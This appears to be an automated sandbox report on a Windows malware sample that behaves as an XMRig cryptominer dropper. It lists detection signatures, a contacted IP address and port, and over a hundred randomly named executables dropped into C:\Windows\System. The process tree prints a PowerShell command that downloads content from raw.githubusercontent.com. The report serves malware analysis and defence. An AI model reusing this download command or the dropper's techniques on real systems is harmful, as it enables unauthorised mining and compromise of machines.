C:\Windows\System\fuDANJr.exe

C:\Windows\System\fuDANJr.exe

C:\Windows\System\yQveqjN.exe

C:\Windows\System\yQveqjN.exe

C:\Windows\System\bRcagra.exe

C:\Windows\System\bRcagra.exe

C:\Windows\System\fGgqZdN.exe

C:\Windows\System\fGgqZdN.exe

C:\Windows\System\HMiYcfs.exe

C:\Windows\System\HMiYcfs.exe

C:\Windows\System\uwUkdEZ.exe

C:\Windows\System\uwUkdEZ.exe

C:\Windows\System\JydmnAL.exe

C:\Windows\System\JydmnAL.exe

C:\Windows\System\psenWqv.exe

C:\Windows\System\psenWqv.exe

C:\Windows\System\GITEgep.exe

C:\Windows\System\GITEgep.exe

C:\Windows\System\DbFpBee.exe

C:\Windows\System\DbFpBee.exe

C:\Windows\System\jjWrOfP.exe

C:\Windows\System\jjWrOfP.exe

C:\Windows\System\EEFQRUo.exe

C:\Windows\System\EEFQRUo.exe

C:\Windows\System\OOTYuOG.exe

C:\Windows\System\OOTYuOG.exe

C:\Windows\System\uIsuEGV.exe

C:\Windows\System\uIsuEGV.exe

C:\Windows\System\feEKRUB.exe

C:\Windows\System\feEKRUB.exe

C:\Windows\System\nHCABGg.exe

C:\Windows\System\nHCABGg.exe

C:\Windows\System\MXcJIUp.exe

C:\Windows\System\MXcJIUp.exe

C:\Windows\System\yvUsOOp.exe

C:\Windows\System\yvUsOOp.exe

C:\Windows\System\kPUaPYg.exe

C:\Windows\System\kPUaPYg.exe

C:\Windows\System\lCFPurm.exe

C:\Windows\System\lCFPurm.exe

C:\Windows\System\XtZvYcC.exe

C:\Windows\System\XtZvYcC.exe

C:\Windows\System\dFfLcQN.exe

C:\Windows\System\dFfLcQN.exe

C:\Windows\System\owVAwxO.exe

C:\Windows\System\owVAwxO.exe

C:\Windows\System\deZpCQr.exe

C:\Windows\System\deZpCQr.exe

C:\Windows\System\bKTHvGz.exe

C:\Windows\System\bKTHvGz.exe

C:\Windows\System\xVvLsPI.exe

C:\Windows\System\xVvLsPI.exe

C:\Windows\System\mvFyfci.exe

C:\Windows\System\mvFyfci.exe

C:\Windows\System\lphbeND.exe

C:\Windows\System\lphbeND.exe

C:\Windows\System\BklNdiN.exe

C:\Windows\System\BklNdiN.exe

C:\Windows\System\WgwaHdj.exe

C:\Windows\System\WgwaHdj.exe

C:\Windows\System\hfsMVcq.exe

C:\Windows\System\hfsMVcq.exe

C:\Windows\System\VyvwfHA.exe

C:\Windows\System\VyvwfHA.exe

C:\Windows\System\JJxQkFb.exe

C:\Windows\System\JJxQkFb.exe

C:\Windows\System\UGqThgx.exe

C:\Windows\System\UGqThgx.exe

C:\Windows\System\GQemPhX.exe

C:\Windows\System\GQemPhX.exe

C:\Windows\System\dPlryBL.exe

C:\Windows\System\dPlryBL.exe

C:\Windows\System\bQWSpGc.exe

C:\Windows\System\bQWSpGc.exe

C:\Windows\System\SETrkvC.exe

C:\Windows\System\SETrkvC.exe

C:\Windows\System\XQpoXTv.exe

C:\Windows\System\XQpoXTv.exe

C:\Windows\System\MWShQlO.exe

C:\Windows\System\MWShQlO.exe

C:\Windows\System\hLCUexc.exe

C:\Windows\System\hLCUexc.exe

C:\Windows\System\YxZNOIo.exe

C:\Windows\System\YxZNOIo.exe

C:\Windows\System\bMtADqP.exe

C:\Windows\System\bMtADqP.exe

C:\Windows\System\RvSnsLv.exe

C:\Windows\System\RvSnsLv.exe

C:\Windows\System\eDfheUK.exe

C:\Windows\System\eDfheUK.exe

C:\Windows\System\AynEfPR.exe

C:\Windows\System\AynEfPR.exe

C:\Windows\System\haYwqmV.exe

C:\Windows\System\haYwqmV.exe

C:\Windows\System\RzCXPTt.exe

C:\Windows\System\RzCXPTt.exe

C:\Windows\System\lEtduAZ.exe

C:\Windows\System\lEtduAZ.exe

C:\Windows\System\mGjqiGy.exe

C:\Windows\System\mGjqiGy.exe

C:\Windows\System\ygkaJWB.exe

C:\Windows\System\ygkaJWB.exe

C:\Windows\System\yDyJhuC.exe

C:\Windows\System\yDyJhuC.exe

C:\Windows\System\oXTPUrR.exe

C:\Windows\System\oXTPUrR.exe

C:\Windows\System\DJyYgWL.exe

C:\Windows\System\DJyYgWL.exe

C:\Windows\System\aGSnAVU.exe

C:\Windows\System\aGSnAVU.exe

C:\Windows\System\ePZpjhc.exe

C:\Windows\System\ePZpjhc.exe

C:\Windows\System\SJMFbPx.exe

C:\Windows\System\SJMFbPx.exe

C:\Windows\System\fCGmqxi.exe

C:\Windows\System\fCGmqxi.exe

C:\Windows\System\fTpgKzK.exe

C:\Windows\System\fTpgKzK.exe

C:\Windows\System\joQGprS.exe

C:\Windows\System\joQGprS.exe

C:\Windows\System\bIAgyXp.exe

C:\Windows\System\bIAgyXp.exe

C:\Windows\System\vxpdDHq.exe

C:\Windows\System\vxpdDHq.exe

C:\Windows\System\wipOKql.exe

C:\Windows\System\wipOKql.exe

C:\Windows\System\BgHYmYI.exe

C:\Windows\System\BgHYmYI.exe

C:\Windows\System\ZzYAfoC.exe

C:\Windows\System\ZzYAfoC.exe

C:\Windows\System\drTaKLC.exe

C:\Windows\System\drTaKLC.exe

C:\Windows\System\NkBhAEt.exe

C:\Windows\System\NkBhAEt.exe

C:\Windows\System\NtiHQPF.exe

C:\Windows\System\NtiHQPF.exe

C:\Windows\System\IrZEpUJ.exe

C:\Windows\System\IrZEpUJ.exe

C:\Windows\System\cKpyfdt.exe

C:\Windows\System\cKpyfdt.exe

C:\Windows\System\CSUETNM.exe

C:\Windows\System\CSUETNM.exe

C:\Windows\System\zQwMbNC.exe

C:\Windows\System\zQwMbNC.exe

C:\Windows\System\lczHzbp.exe

C:\Windows\System\lczHzbp.exe

C:\Windows\System\ooRPEDI.exe

C:\Windows\System\ooRPEDI.exe

C:\Windows\System\PPnsMbS.exe

C:\Windows\System\PPnsMbS.exe

C:\Windows\System\YbBEUQu.exe

C:\Windows\System\YbBEUQu.exe

C:\Windows\System\RDchMQq.exe

C:\Windows\System\RDchMQq.exe

C:\Windows\System\nKhQBCW.exe

C:\Windows\System\nKhQBCW.exe

C:\Windows\System\OgMpbJY.exe

C:\Windows\System\OgMpbJY.exe

C:\Windows\System\YNssces.exe

C:\Windows\System\YNssces.exe

C:\Windows\System\mKYvWha.exe

C:\Windows\System\mKYvWha.exe

C:\Windows\System\wONeOzZ.exe

C:\Windows\System\wONeOzZ.exe

C:\Windows\System\WjdDXOY.exe

C:\Windows\System\WjdDXOY.exe

C:\Windows\System\frdMfQO.exe

C:\Windows\System\frdMfQO.exe

C:\Windows\System\neyaSwr.exe

C:\Windows\System\neyaSwr.exe

C:\Windows\System\hZTHiQy.exe

C:\Windows\System\hZTHiQy.exe

C:\Windows\System\bigNJYq.exe

C:\Windows\System\bigNJYq.exe

C:\Windows\System\UTpoOVr.exe

C:\Windows\System\UTpoOVr.exe

C:\Windows\System\nPhQBYv.exe

C:\Windows\System\nPhQBYv.exe

C:\Windows\System\GXzeTQA.exe

C:\Windows\System\GXzeTQA.exe

C:\Windows\System\vSiXaPU.exe

C:\Windows\System\vSiXaPU.exe

C:\Windows\System\JjvXkRm.exe

C:\Windows\System\JjvXkRm.exe

C:\Windows\System\jXywLdj.exe

C:\Windows\System\jXywLdj.exe

C:\Windows\System\HGjqaqk.exe

C:\Windows\System\HGjqaqk.exe

C:\Windows\System\XAxbdYO.exe

C:\Windows\System\XAxbdYO.exe

C:\Windows\System\QWcQbdX.exe

C:\Windows\System\QWcQbdX.exe

C:\Windows\System\mIGvXqw.exe

C:\Windows\System\mIGvXqw.exe

C:\Windows\System\mtiWINO.exe

C:\Windows\System\mtiWINO.exe

C:\Windows\System\TcnRoMb.exe

C:\Windows\System\TcnRoMb.exe

C:\Windows\System\AkwGOju.exe

C:\Windows\System\AkwGOju.exe

C:\Windows\System\BNLLjSz.exe

C:\Windows\System\BNLLjSz.exe

C:\Windows\System\YnwRfXy.exe

C:\Windows\System\YnwRfXy.exe

C:\Windows\System\ClCyrJE.exe

C:\Windows\System\ClCyrJE.exe

C:\Windows\System\GyEWBqy.exe

C:\Windows\System\GyEWBqy.exe

C:\Windows\System\CeEFYub.exe

C:\Windows\System\CeEFYub.exe

C:\Windows\System\ttGnnMs.exe

C:\Windows\System\ttGnnMs.exe

C:\Windows\System\kbzrcnB.exe

C:\Windows\System\kbzrcnB.exe

C:\Windows\System\HuQiOpB.exe

C:\Windows\System\HuQiOpB.exe

C:\Windows\System\INadjrh.exe

C:\Windows\System\INadjrh.exe

C:\Windows\System\TgHkezM.exe

C:\Windows\System\TgHkezM.exe

C:\Windows\System\hAABFSz.exe

C:\Windows\System\hAABFSz.exe

C:\Windows\System\wQalpXU.exe

C:\Windows\System\wQalpXU.exe

C:\Windows\System\XMBfsTv.exe

C:\Windows\System\XMBfsTv.exe

C:\Windows\System\TyHQusO.exe

C:\Windows\System\TyHQusO.exe

C:\Windows\System\QBxkZru.exe

C:\Windows\System\QBxkZru.exe

C:\Windows\System\QLDvHOM.exe

C:\Windows\System\QLDvHOM.exe

C:\Windows\System\xPKMUqc.exe

C:\Windows\System\xPKMUqc.exe

C:\Windows\System\OyLYSrZ.exe

C:\Windows\System\OyLYSrZ.exe

C:\Windows\System\PwszQlR.exe

C:\Windows\System\PwszQlR.exe

C:\Windows\System\UauEAdV.exe

C:\Windows\System\UauEAdV.exe

C:\Windows\System\ChQozpI.exe

C:\Windows\System\ChQozpI.exe

C:\Windows\System\BOCmiaY.exe

C:\Windows\System\BOCmiaY.exe

C:\Windows\System\KtcDjHC.exe

C:\Windows\System\KtcDjHC.exe

C:\Windows\System\daVOnIt.exe

C:\Windows\System\daVOnIt.exe

C:\Windows\System\zesuQrs.exe

C:\Windows\System\zesuQrs.exe

C:\Windows\System\evfvVwu.exe

C:\Windows\System\evfvVwu.exe

C:\Windows\System\mVzivJv.exe

C:\Windows\System\mVzivJv.exe

C:\Windows\System\WAzacfm.exe

C:\Windows\System\WAzacfm.exe

C:\Windows\System\qnFLPUM.exe

C:\Windows\System\qnFLPUM.exe

C:\Windows\System\SaaQwJH.exe

C:\Windows\System\SaaQwJH.exe

C:\Windows\System\hJjfaZK.exe

C:\Windows\System\hJjfaZK.exe

C:\Windows\System\gxLnphZ.exe

C:\Windows\System\gxLnphZ.exe

C:\Windows\System\CTriAEb.exe

C:\Windows\System\CTriAEb.exe

C:\Windows\System\ybXnfLe.exe

C:\Windows\System\ybXnfLe.exe

C:\Windows\System\IHhkLpa.exe

C:\Windows\System\IHhkLpa.exe

C:\Windows\System\puRhRtz.exe

C:\Windows\System\puRhRtz.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 10:27

Reported

2024-06-12 10:30

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4788 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4788 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\GuQYdAi.exe
PID 4788 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ibJwJkO.exe
PID 4788 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\XpOIqaF.exe
PID 4788 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ABISsQx.exe
PID 4788 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lzjuSaZ.exe
PID 4788 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\LhPNcwc.exe
PID 4788 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OwxPNSm.exe
PID 4788 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VtUfpKp.exe
PID 4788 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\UMxQyFW.exe
PID 4788 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\brfPXjn.exe
PID 4788 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FiUftQL.exe
PID 4788 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\yYgbnon.exe
PID 4788 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\yYgbnon.exe
PID 4788 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RPjlMqe.exe
PID 4788 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RPjlMqe.exe
PID 4788 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\qMTBAsP.exe
PID 4788 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\qMTBAsP.exe
PID 4788 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\iIdMqQG.exe
PID 4788 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\iIdMqQG.exe
PID 4788 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lUZwSgU.exe
PID 4788 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lUZwSgU.exe
PID 4788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ewqbMtT.exe
PID 4788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ewqbMtT.exe
PID 4788 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\uPckzTH.exe
PID 4788 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\uPckzTH.exe
PID 4788 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\cDhwHWH.exe
PID 4788 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\cDhwHWH.exe
PID 4788 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FVvaqxz.exe
PID 4788 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FVvaqxz.exe
PID 4788 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\SCCvpyQ.exe
PID 4788 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\SCCvpyQ.exe
PID 4788 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\xyHcubE.exe
PID 4788 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\xyHcubE.exe
PID 4788 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OAiCHue.exe
PID 4788 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OAiCHue.exe
PID 4788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ihkzmUl.exe
PID 4788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ihkzmUl.exe
PID 4788 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\QosOhYI.exe
PID 4788 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\QosOhYI.exe
PID 4788 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\WZKnJMo.exe
PID 4788 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\WZKnJMo.exe
PID 4788 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\BsDjvmz.exe
PID 4788 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\BsDjvmz.exe
PID 4788 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\pIqAcxI.exe
PID 4788 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\pIqAcxI.exe
PID 4788 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\zPpOCVO.exe
PID 4788 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\zPpOCVO.exe
PID 4788 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\vhHmvFP.exe
PID 4788 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\vhHmvFP.exe
PID 4788 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RXMZPuQ.exe
PID 4788 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RXMZPuQ.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\vXhPjai.exe

C:\Windows\System\vXhPjai.exe

C:\Windows\System\KGEZqcs.exe

C:\Windows\System\KGEZqcs.exe

C:\Windows\System\wGYrich.exe

C:\Windows\System\wGYrich.exe

C:\Windows\System\jPYxjDn.exe

C:\Windows\System\jPYxjDn.exe

C:\Windows\System\wWJTzfc.exe

C:\Windows\System\wWJTzfc.exe

C:\Windows\System\BXirmea.exe

C:\Windows\System\BXirmea.exe

C:\Windows\System\pnrQqbB.exe

C:\Windows\System\pnrQqbB.exe

C:\Windows\System\QhlZmnA.exe

C:\Windows\System\QhlZmnA.exe

C:\Windows\System\ZMonYdv.exe

C:\Windows\System\ZMonYdv.exe

C:\Windows\System\EbOLMHO.exe

C:\Windows\System\EbOLMHO.exe

C:\Windows\System\IOLqvum.exe

C:\Windows\System\IOLqvum.exe

C:\Windows\System\BMKlKKB.exe

C:\Windows\System\BMKlKKB.exe

C:\Windows\System\uFxqxXq.exe

C:\Windows\System\uFxqxXq.exe

C:\Windows\System\zrorXSP.exe

C:\Windows\System\zrorXSP.exe

C:\Windows\System\WjfGWOO.exe

C:\Windows\System\WjfGWOO.exe

C:\Windows\System\idPBfBy.exe

C:\Windows\System\idPBfBy.exe

C:\Windows\System\ckmTPcM.exe

C:\Windows\System\ckmTPcM.exe

C:\Windows\System\hYBGVyi.exe

C:\Windows\System\hYBGVyi.exe

C:\Windows\System\SeuJoXS.exe

C:\Windows\System\SeuJoXS.exe

C:\Windows\System\ATyTTwV.exe

C:\Windows\System\ATyTTwV.exe

C:\Windows\System\BylXGfQ.exe

C:\Windows\System\BylXGfQ.exe

C:\Windows\System\heoJhGh.exe

C:\Windows\System\heoJhGh.exe

C:\Windows\System\CoVlDNg.exe

C:\Windows\System\CoVlDNg.exe

C:\Windows\System\IWKriuE.exe

C:\Windows\System\IWKriuE.exe

C:\Windows\System\dAwVHEv.exe

C:\Windows\System\dAwVHEv.exe

C:\Windows\System\sFDcaCa.exe

C:\Windows\System\sFDcaCa.exe

C:\Windows\System\aanKBVR.exe

C:\Windows\System\aanKBVR.exe

C:\Windows\System\WGUQxoh.exe

C:\Windows\System\WGUQxoh.exe

C:\Windows\System\ipvhWIi.exe

C:\Windows\System\ipvhWIi.exe

C:\Windows\System\nLKFNFi.exe

C:\Windows\System\nLKFNFi.exe

C:\Windows\System\FslsLln.exe

C:\Windows\System\FslsLln.exe

C:\Windows\System\FRBjCRu.exe

C:\Windows\System\FRBjCRu.exe

C:\Windows\System\yLeGOAc.exe

C:\Windows\System\yLeGOAc.exe

C:\Windows\System\rGVhnok.exe

C:\Windows\System\rGVhnok.exe

C:\Windows\System\sUfqvgC.exe

C:\Windows\System\sUfqvgC.exe

C:\Windows\System\qCCscPJ.exe

C:\Windows\System\qCCscPJ.exe

C:\Windows\System\ScuHrDZ.exe

C:\Windows\System\ScuHrDZ.exe

C:\Windows\System\lvyKjUp.exe

C:\Windows\System\lvyKjUp.exe

C:\Windows\System\WebVUgt.exe

C:\Windows\System\WebVUgt.exe

C:\Windows\System\PtCwakD.exe

C:\Windows\System\PtCwakD.exe

C:\Windows\System\RBqRNrJ.exe

C:\Windows\System\RBqRNrJ.exe

C:\Windows\System\kYemIPM.exe

C:\Windows\System\kYemIPM.exe

C:\Windows\System\vmWoBFG.exe

C:\Windows\System\vmWoBFG.exe

C:\Windows\System\TdOEInq.exe

C:\Windows\System\TdOEInq.exe

C:\Windows\System\GvqxHvJ.exe

C:\Windows\System\GvqxHvJ.exe

C:\Windows\System\ZkWoGsx.exe

C:\Windows\System\ZkWoGsx.exe

C:\Windows\System\GtaONkI.exe

C:\Windows\System\GtaONkI.exe

C:\Windows\System\aXmdUKs.exe

C:\Windows\System\aXmdUKs.exe

C:\Windows\System\dnOurFY.exe

C:\Windows\System\dnOurFY.exe

C:\Windows\System\PSdQofO.exe

C:\Windows\System\PSdQofO.exe

C:\Windows\System\YNTesXb.exe

C:\Windows\System\YNTesXb.exe

C:\Windows\System\vfCFAJG.exe

C:\Windows\System\vfCFAJG.exe

C:\Windows\System\jkVYOnL.exe

C:\Windows\System\jkVYOnL.exe

C:\Windows\System\XIozgsD.exe

C:\Windows\System\XIozgsD.exe

C:\Windows\System\EJcKKMt.exe

C:\Windows\System\EJcKKMt.exe

C:\Windows\System\YZgPQia.exe

C:\Windows\System\YZgPQia.exe

C:\Windows\System\wrkrkyp.exe

C:\Windows\System\wrkrkyp.exe

C:\Windows\System\vYnbYXW.exe

C:\Windows\System\vYnbYXW.exe

C:\Windows\System\NfKByPM.exe

C:\Windows\System\NfKByPM.exe

C:\Windows\System\cbaywLn.exe

C:\Windows\System\cbaywLn.exe

C:\Windows\System\yiRsViG.exe

C:\Windows\System\yiRsViG.exe

C:\Windows\System\pXYXEZK.exe

C:\Windows\System\pXYXEZK.exe

C:\Windows\System\aReDaiB.exe

C:\Windows\System\aReDaiB.exe

C:\Windows\System\uHoEHde.exe

C:\Windows\System\uHoEHde.exe

C:\Windows\System\lHeVNOJ.exe

C:\Windows\System\lHeVNOJ.exe

C:\Windows\System\oZOLOiw.exe

C:\Windows\System\oZOLOiw.exe

C:\Windows\System\feGsBjd.exe

C:\Windows\System\feGsBjd.exe

C:\Windows\System\WnUQeBa.exe

C:\Windows\System\WnUQeBa.exe

C:\Windows\System\mjYPZLr.exe

C:\Windows\System\mjYPZLr.exe

C:\Windows\System\vQTpGuk.exe

C:\Windows\System\vQTpGuk.exe

C:\Windows\System\QEwWjLq.exe

C:\Windows\System\QEwWjLq.exe

C:\Windows\System\eMiqmJa.exe

C:\Windows\System\eMiqmJa.exe

C:\Windows\System\tqbNsKv.exe

C:\Windows\System\tqbNsKv.exe

C:\Windows\System\soRxPzK.exe

C:\Windows\System\soRxPzK.exe

C:\Windows\System\OqDrSxB.exe

C:\Windows\System\OqDrSxB.exe

C:\Windows\System\XeWuViR.exe

C:\Windows\System\XeWuViR.exe

C:\Windows\System\sHxuHEV.exe

C:\Windows\System\sHxuHEV.exe

C:\Windows\System\DpvENSr.exe

C:\Windows\System\DpvENSr.exe

C:\Windows\System\OUgOQWO.exe

C:\Windows\System\OUgOQWO.exe

C:\Windows\System\YHuRnyz.exe

C:\Windows\System\YHuRnyz.exe

C:\Windows\System\DGLrhgs.exe

C:\Windows\System\DGLrhgs.exe

C:\Windows\System\nEmcyAJ.exe

C:\Windows\System\nEmcyAJ.exe

C:\Windows\System\ctSQOol.exe

C:\Windows\System\ctSQOol.exe

C:\Windows\System\cfsbplB.exe

C:\Windows\System\cfsbplB.exe

C:\Windows\System\FxAvOhp.exe

C:\Windows\System\FxAvOhp.exe

C:\Windows\System\rpjmesr.exe

C:\Windows\System\rpjmesr.exe

C:\Windows\System\ZKQfMJg.exe

C:\Windows\System\ZKQfMJg.exe

C:\Windows\System\aOrkffi.exe

C:\Windows\System\aOrkffi.exe

C:\Windows\System\POwBATg.exe

C:\Windows\System\POwBATg.exe

C:\Windows\System\bSQYENA.exe

C:\Windows\System\bSQYENA.exe

C:\Windows\System\mtowCBn.exe

C:\Windows\System\mtowCBn.exe

C:\Windows\System\StCcDDv.exe

C:\Windows\System\StCcDDv.exe

C:\Windows\System\zmNOYDn.exe

C:\Windows\System\zmNOYDn.exe

C:\Windows\System\yZkIaaU.exe

C:\Windows\System\yZkIaaU.exe

C:\Windows\System\wGYrEps.exe

C:\Windows\System\wGYrEps.exe

